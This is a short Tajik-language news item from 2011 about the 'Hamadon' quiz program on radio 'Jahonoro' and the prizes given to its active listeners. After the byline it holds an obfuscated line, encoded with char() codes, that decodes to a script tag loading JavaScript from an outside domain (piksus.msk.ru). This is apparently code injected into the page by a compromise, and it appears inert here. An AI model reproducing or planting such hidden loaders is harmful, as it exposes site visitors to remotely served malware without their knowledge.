11.03.2011
Барномаи ҷадид дар радиои «Ҷаҳоноро»
Тӯли як моҳ мешавад , ки дар радиои "Ҷаҳоноро" руй мавҷи 107,5 FM барномаи навтаъсис бо номи «Ҳамадон» пахш мегардад. Барнома мустақим буда он тариқи саволу ҷавоб сурат гирифта барои он нафароне, ки зиёд дар ин барнома иштирок ва ба суолҳо посухи дурустро гуфтанд тӯҳфаҳо пешниҳод карда шуда буд. Даври авали барномаи мазкур дар давоми 15-рӯз ҷамъбаст гашта аз ҳама дар ин барнома зиёд иштирок карда ва ба суолҳои пешниҳод гашта посухи дурустро ҷавоб дода муайян карда шуд. Иштирок чиёне, ки зиёд дар ин барнома фаъол буданд. Назарова Дилбар, Тӯтиниссо Шарипова, Раҳматова Дилором ва Сӯҳроб Мадалиев буданд, ки аз ҳама бисёр дар барнома иштирок карданд.
Ба иштирок чиёни фаъоли барнома санаи 08.03.2011 тӯҳфаҳо дар Қасри Ҷавонони ба номи Лоиқ Шерали дар консерти Мирзомубин Қӯзиев аз тарафи радиои "Ҷаҳоноро" ва ҳамкори дигари ин барнома мағозаи компутерии «SmartBook» супорида шуд , Тутинссо Шариповаи шасту чор бо гирифтани туҳфаи хотирави хеле шод гашта ҳамагонро бо ин руз табрик намуд.
Барномаи «Ҳамадон» минбаъд низ дар радиои "Ҷаҳоноро" чунин иқдоми худро идома дода барои иштирок чиёни фаъоли барнома тӯҳфаҳои хотиравиро пешниҳод менамояд. Хотиррасон бояд кард, ки барномаи мазкур ҳар руз аз соати 10 то соати 11 ба тариқи саволу ҷавоб сурат гирифта барои баланд бардоштани сатҳи дониши мухлисонаш мусоидат хоҳад кард.
«Суғд»
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)19f81094a3acdad7f801fd7d5982f074.js" type="text/javascript">

ТАВЗЕҲОТ